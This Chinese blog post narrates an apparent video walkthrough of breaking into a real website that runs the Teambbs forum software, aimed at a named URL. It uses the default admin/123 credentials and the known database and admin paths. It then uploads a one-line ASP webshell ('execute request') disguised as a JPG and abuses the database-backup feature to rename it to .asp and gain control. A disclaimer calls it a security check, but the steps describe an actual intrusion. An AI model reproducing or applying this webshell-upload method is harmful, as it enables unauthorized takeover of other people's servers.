博客网 >

Teambbs漏洞入侵

动画开始:
我已经下了程序看了下,这就是他的程序

看了关键的地方 数据库:data/team.mdb

后台:manage/admin.asp 试了才知道要先进前台才有用

上传的图片放在 images\upfile里面

现在开始 我们今天的目标是  http://www.1234567.com/bbs/Default.asp   哦还有一点  他默认前台和后台管理员的用户名admin  密码是123  我今天的目标什么都没改  运气好哦 我们先进去   可以备份 
可以上传  不过他有限制  这是小马  我们试试   备份的文件并非合法的数据库!  不行  

我换了插数据库的小马也不行  我这里就不试了  不过我们可以用一句话  <%execute request("value")%>  我把他改成了图片  就是0.jpg了 我们来试试

恭喜你!

备份数据库成功,您备份的数据库路径为h:\wwwroot\hnqjwh123\wwwroot\bbs\Manage\\s.asp 
现在我们来连  我直接上大马了  进去了    就到这里把             


  免责声明:如果你利用本站所讲的知识入侵别人,请后果自负。本站只是友情安全检测!!!切记!

<< 静思己过! / Celeb(名人)皮鞋美容连锁店... >>

专题推荐

不平凡的水果世界

不平凡的水果世界

平凡的水果世界,平凡中的不平凡。 今朝看水果是水果 ,看水果还是水果 ,看水果已不是水果。这境界,谁人可比?在不平凡的水果世界里,仁者见仁,智者见智。

中国春节的那些习俗

中国春节的那些习俗

正月是农历新年的开始,人们往往将它看作是新的一年年运好坏的兆示期。所以,过年的时候“禁忌”特别多。当然,各个地方的风俗习惯不一样,过年的禁忌也是不一样的。

评论
0/200
表情 验证码:

surfers

  • 文章总数0
  • 画报总数0
  • 画报点击数0
  • 文章点击数0
个人排行
        博文分类
        日期归档